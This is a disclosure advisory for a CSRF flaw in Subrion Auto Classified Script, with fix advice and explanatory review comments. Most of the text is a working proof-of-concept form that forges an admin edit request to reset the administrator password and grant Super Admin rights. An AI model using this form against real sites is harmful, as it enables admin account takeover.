< ------------------- header data start ------------------- >

#############################################################

# Application Name :Subrion Auto Classified Script

# Vulnerability Type : xsrf (CSRF)

# Impact : Uzaktan otomatik olarak admin bilgileri degistirilebilir.

# Bug Fix Advice : Form'a Oturum Key'i (Session Token) eklenmeli, eski sifre sorulmalidir.

# author : BUG RESEARCHERS//CWH1RLPOOL

#############################################################

< ------------------- header data end of ------------------- >

< -- bug code start -- >
<!-- Advisory proof-of-concept: a cross-site POST to the admin edit endpoint for id=1.
     The request carries the same fields the legitimate edit form would, so the
     defect under review is server-side: how (or whether) the request's origin is
     verified before the admin record is changed. -->
<form action=http://autos.subrion.com/admin/admins_manage.php?id=1&action=edit method=post>
<!-- NOTE(review): the anti-CSRF field is embedded with a fixed value. A foreign page
     can only succeed with it if the server does not bind prevent_csrf to the victim's
     session or does not validate it at all; which of the two applies is not
     verifiable from this page. Mitigation: issue an unpredictable per-session token,
     compare it server-side with a constant-time check, and set SameSite on the admin
     session cookie as defence in depth. -->
<input type=hidden name=prevent_csrf value=174eac6f2b /><table cellspacing=0 cellpadding=0 width=100% class=striped>

<td class=caption colspan=2><strong>General Information</strong></td>

<td width=200><strong>username:</strong></td>
<td><input type=text name=username size=22 value=admin/></td>


<td><strong>Full Name:</strong></td>
<td><input type=text name=fullname size=22 value=Administrator/></td>

<td><strong>Email:</strong></td>
<td><input type=text name=email size=22 value=[email protected] /></td>

<!-- The edit form accepts a new password (new_pass / new_pass2) with no
     current-password field. Requiring re-authentication for credential changes
     is the advisory's second fix and limits what a forged request can achieve
     even if the token check is bypassed. -->
<td><strong>password:</strong></td>

<td><input type=password name=new_pass size=22 /></td>

<td><strong>password Confirmation:</strong></td>
<td><input type=password name=new_pass2 size=22 /></td>

<td><strong>Status:</strong></td>
<td><select name=status>
<option value=approval >Approval</option>

<option value=active selected=selected>Active</option>
</select></td>

<td class=caption colspan=2><strong>Admin Permissions</strong></td>

<!-- super=1 is pre-selected, so the same request also grants the Super Admin role;
     privilege fields on an account-edit endpoint deserve the same origin check. -->
<td><strong>Super Admin:</strong></td>
<td><input type=radio name=super value=1 id=type1 checked=checked onclick=javascript:$(’#permissions’).fadeOut(); /><label for=type1>Enabled</label>

<input type=radio name=super value=0 id=type0 onclick=javascript:$(’#permissions’).fadeIn();/><label for=type0>Disabled</label>
</td>

</table>
<!-- Fine-grained permissions[] checkboxes, hidden while super=1. The inline
     handlers below contain typographic quotes (’) from copy/paste mangling; they are
     cosmetic here and unrelated to the CSRF issue. -->
<div id=permissions style=display: none;>
<fieldset class=collapsible style=float:left;margin-left:20px;><legend>Common</legend><input type=checkbox onclick=var hsrc = this; $(’input.group_Common’).each(function() {
if($(this).attr(’checked’) && !$(hsrc).attr(’checked’))
{
$(this).removeAttr(’checked’);
}
else
{
$(this).attr(’checked’, ’checked’);
}
});><i>select All </i><br />
<ul style=list-style-type:none><li><input type=checkbox class=group_Common name=permissions[] value=admin_home id=tsadmin_home /><label for=tsadmin_home>Admin Panel</label></li><li><input type=checkbox class=group_Common name=permissions[] value=configuration id=tsconfiguration /><label for=tsconfiguration>Configuration</label></li><li><input type=checkbox class=group_Common name=permissions[] value=admins_manage id=tsadmins_manage /><label for=tsadmins_manage>Manage Admins</label></li><li><input type=checkbox class=group_Common name=permissions[] value=pages_manage id=tspages_manage /><label for=tspages_manage>Manage Pages</label></li><li><input type=checkbox class=group_Common name=permissions[] value=plugins_manage id=tsplugins_manage /><label for=tsplugins_manage>Manage Plugins</label></li><li><input type=checkbox class=group_Common name=permissions[] value=packages_manage id=tspackages_manage /><label for=tspackages_manage>Manage Packages</label></li><li><input type=checkbox class=group_Common name=permissions[] value=database_manage id=tsdatabase_manage /><label for=tsdatabase_manage>Manage Database</label></li><li><input type=checkbox class=group_Common name=permissions[] value=menus_manage id=tsmenus_manage /><label for=tsmenus_manage>Manage Menus</label></li><li><input type=checkbox class=group_Common name=permissions[] value=language_manage id=tslanguage_manage /><label for=tslanguage_manage>Language Manager</label></li><li><input type=checkbox class=group_Common name=permissions[] value=blocks_manage id=tsblocks_manage /><label for=tsblocks_manage>Manage Blocks</label></li><li><input type=checkbox class=group_Common name=permissions[] value=visual_manage id=tsvisual_manage /><label for=tsvisual_manage>Visual Manage</label></li><li><input type=checkbox class=group_Common name=permissions[] value=transactions_manage id=tstransactions_manage /><label for=tstransactions_manage>Manage Transactions</label></li><li><input type=checkbox class=group_Common 
name=permissions[] value=plans_manage id=tsplans_manage /><label for=tsplans_manage>Manage Plans</label></li></fieldset><fieldset class=collapsible style=float:left;margin-left:20px;><legend>Accounts</legend><input type=checkbox onclick=var hsrc = this; $(’input.group_Accounts’).each(function() {
if($(this).attr(’checked’) && !$(hsrc).attr(’checked’))
{
$(this).removeAttr(’checked’);
}
else
{
$(this).attr(’checked’, ’checked’);
}
});><i>select All </i><br />

<ul style=list-style-type:none><li><input type=checkbox class=group_Accounts name=permissions[] value=accounts_fields_manage id=tsaccounts_fields_manage /><label for=tsaccounts_fields_manage>Accounts Fields</label></li><li><input type=checkbox class=group_Accounts name=permissions[] value=accounts_fields_groups_manage id=tsaccounts_fields_groups_manage /><label for=tsaccounts_fields_groups_manage>Accounts FieldGroups</label></li><li><input type=checkbox class=group_Accounts name=permissions[] value=accounts_manage id=tsaccounts_manage /><label for=tsaccounts_manage>Manage Accounts</label></li><li><input type=checkbox class=group_Accounts name=permissions[] value=accounts_search id=tsaccounts_search /><label for=tsaccounts_search>Search account</label></li><li><input type=checkbox class=group_Accounts name=permissions[] value=accounts_add id=tsaccounts_add /><label for=tsaccounts_add>Add account</label></li></fieldset><fieldset class=collapsible style=float:left;margin-left:20px;><legend>Autos</legend><input type=checkbox onclick=var hsrc = this; $(’input.group_Autos’).each(function() {
if($(this).attr(’checked’) && !$(hsrc).attr(’checked’))
{
$(this).removeAttr(’checked’);
}
else
{
$(this).attr(’checked’, ’checked’);
}
});><i>select All </i><br />
<ul style=list-style-type:none><li><input type=checkbox class=group_Autos name=permissions[] value=autos_fields_groups_manage id=tsautos_fields_groups_manage /><label for=tsautos_fields_groups_manage>Autos Field Groups</label></li><li><input type=checkbox class=group_Autos name=permissions[] value=makes_browse id=tsmakes_browse /><label for=tsmakes_browse>Browse Makes</label></li><li><input type=checkbox class=group_Autos name=permissions[] value=makes_submit id=tsmakes_submit /><label for=tsmakes_submit>Submit Make</label></li><li><input type=checkbox class=group_Autos name=permissions[] value=autos_fields_manage id=tsautos_fields_manage /><label for=tsautos_fields_manage>Autos Fields</label></li><li><input type=checkbox class=group_Autos name=permissions[] value=autos_manage id=tsautos_manage /><label for=tsautos_manage>Manage Autos</label></li><li><input type=checkbox class=group_Autos name=permissions[] value=autos_submit id=tsautos_submit /><label for=tsautos_submit>Submit Auto</label></li><li><input type=checkbox class=group_Autos name=permissions[] value=autos_search id=tsautos_search /><label for=tsautos_search>Search Auto</label></li></fieldset><fieldset class=collapsible style=float:left;margin-left:20px;><legend>Other</legend><input type=checkbox onclick=var hsrc = this; $(’input.group_Other’).each(function() {
if($(this).attr(’checked’) && !$(hsrc).attr(’checked’))
{
$(this).removeAttr(’checked’);
}
else
{
$(this).attr(’checked’, ’checked’);
}
});><i>select All </i><br />

<ul style=list-style-type:none><li><input type=checkbox class=group_Other name=permissions[] value=contact_us id=tscontact_us /><label for=tscontact_us>Contact Us</label></li></fieldset><div style=clear:both;></div>
</div>
<table cellspacing=0 width=100%>
<tr class=all>
<!-- Target record and action are repeated as hidden fields (id=1, action=edit),
     matching the query string on the form action. Deciding the target from request
     parameters alone is what makes origin verification essential here. -->
<td colspan=2><input type=submit class=button name=save value=Save Changes />
<input type=hidden name=id value=1 />
<input type=hidden name=action value=edit />
</td>

</table>
</form>
< -- bug code end of -- >